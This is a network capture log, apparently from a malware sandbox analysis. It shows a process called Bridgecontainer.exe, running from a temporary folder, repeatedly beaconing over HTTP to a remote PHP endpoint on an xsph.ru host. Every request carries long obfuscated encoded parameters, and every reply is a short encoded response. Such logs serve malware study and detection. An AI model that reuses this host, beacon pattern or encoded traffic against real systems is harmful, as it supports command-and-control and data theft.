Jan 2, 2025 05:19:51.728722095 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:19:52.417803049 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50009	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:57.436964989 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:19:58.234035015 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:19:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50010	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:03.246721029 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:03.934907913 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50011	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:08.952136040 CET	2206	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:20:09.626683950 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50012	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:14.637654066 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:15.312179089 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:15 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50013	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:20.328696966 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:21.045594931 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50014	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:26.064923048 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:26.739919901 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50015	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:31.762175083 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:20:32.641308069 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:20:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	50016	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:20:37.653153896 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 